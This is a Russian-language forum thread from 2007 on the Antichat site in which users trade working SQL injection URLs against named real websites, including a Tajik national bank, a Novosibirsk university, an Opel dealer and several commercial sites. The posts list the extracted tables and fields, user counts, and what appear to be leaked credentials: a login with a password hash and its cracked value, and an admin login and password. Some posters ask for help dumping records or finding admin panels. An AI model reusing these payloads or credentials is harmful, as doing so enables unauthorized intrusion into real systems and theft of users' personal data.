ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

sql-inj
  #1  
Старый 13.04.2007, 22:01
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://flash-gorod.net/
уязвимость: http://flash-gorod.net/files.php?cat=4'
подобранные таблицы: users
подобранные поля: nick,password,icq,email,city,sex
767 организмов
Цитата:
http://flash-gorod.net/files.php?cat=-4%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,c oncat_ws(0x3a,id,nick,password,icq,email,city,sex) %20from%20users/*
 

  #2  
Старый 13.04.2007, 22:00
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,4,name,6,7,8,9+from+forum/*
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),user(),5,6/*

Последний раз редактировалось *D1VER; 13.04.2007 в 22:10..
 

  #3  
Старый 13.04.2007, 22:22
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

попалась скуль в банке таджикистана =)
помогите вывести записи!!!
http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*
 

  #4  
Старый 13.04.2007, 23:38
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от kair  
попалась скуль в банке таджикистана =)
помогите вывести записи!!!
http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*
Код:
http://www.nbt.tj/?c=44&id=44&a=-289+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4,5/*
но таблиц чето не нашел
 

sql-inj
  #5  
Старый 13.04.2007, 23:15
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://inetoncd.ru/
уязвимость: http://inetoncd.ru/catalog_order.php?hash=211638&mom=76'
подобранные таблицы: clients
подобранные поля: id,login,password
3392 организма
Цитата:
http://inetoncd.ru/catalog_order.php?hash=211638&mom=-76%20union%20select%201,2,concat_ws(0x3a,id,login, password),4,5,6%20from%20mysql.clients/*
 

sql-inj
  #6  
Старый 13.04.2007, 23:47
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Новосибирский Гос Тех Университет
Сайт: http://inform.nstu.ru/
уязвимость: http://inform.nstu.ru/index.php?type=ubilei&stat=1'
подобранные таблицы: users
подобранные поля: login,password
7 организмов
Цитата:
http://inform.nstu.ru/index.php?type=ubilei&stat=-1%20union%20select%201,2,concat(login,char(58),pas sword),4,5,6,7,8,9,0,1,2,3%20from%20users%20limit% 200,1/*
нулевой организм: ZiF:0b2fdf29656163be070897c655defc12 rockme
 

sql-not_finished
  #7  
Старый 14.04.2007, 00:19
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-not_finished

Незавершенное:

Сайт: http://www.step-into-the-future.ru/ (олимпиада "Шаг в будущее")
Информация: (stepin@aqua2.di-net.ru:4.0.26)
Цитата:
http://www.step-into-the-future.ru/frb_light/view_all_topic.php?&mid=-1&t=&text_po isk=&m_id=-534+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion()),6,7,8/*
Сайт: http://www.idance.ru/ (Портал современных танцев iDance)
Информация: (idancer_idancedb@localhost:4.1.22)
Цитата:
http://www.idance.ru/show.php?id_s=-15+union+select+concat_ws(0x3a,user(),version()),2/*
Сайт: http://www.kif-daks.ru/ (Оптовая торговля книгами. КИФ-Дакс)
Информация: (mataru@localhost:4.1.20-lk-log)
Цитата:
http://www.kif-daks.ru/newprew.php?id=-336+union+select+1,concat_ws(0x3a,user(),version() ),3,4,5,6,7,8/*
Кто продвинется, пишем.

Последний раз редактировалось Koller; 14.04.2007 в 04:41..
 

  #8  
Старый 13.04.2007, 22:45
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

sorry глюканул чё та я.

http://www.akvilon.biz/index.php?content=products&prd_id=-48+union+select+1,2,3, 4/*
Таблицы:
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, banners, categories, images, news, newspics, partners, prices, product_docs, products, sertificates
---------------------------
http://www.uprav.biz/show_action.php?action_id=14762'+union+select+1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6, 7,8,9,10,1,2,3,4,5,6,7,8,9/* -слепая инж order49

Последний раз редактировалось Koller; 13.04.2007 в 23:39..
 

  #9  
Старый 14.04.2007, 04:31
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://opel.avto-city.ru/catalog.php?id=-3+union+select+login,2,pass,4,5,6,7+from+admin/*
opel:reklama
Автоцентр Сити - официальный дилер Opel (Опель)
 

  #10  
Старый 14.04.2007, 08:20
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Код:
http://www.seredina.ru/index.php?id=1&city_id=-12+union+select+concat(login,char(58),pwd)+from+admins/*
хороша дружно ищем админку
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ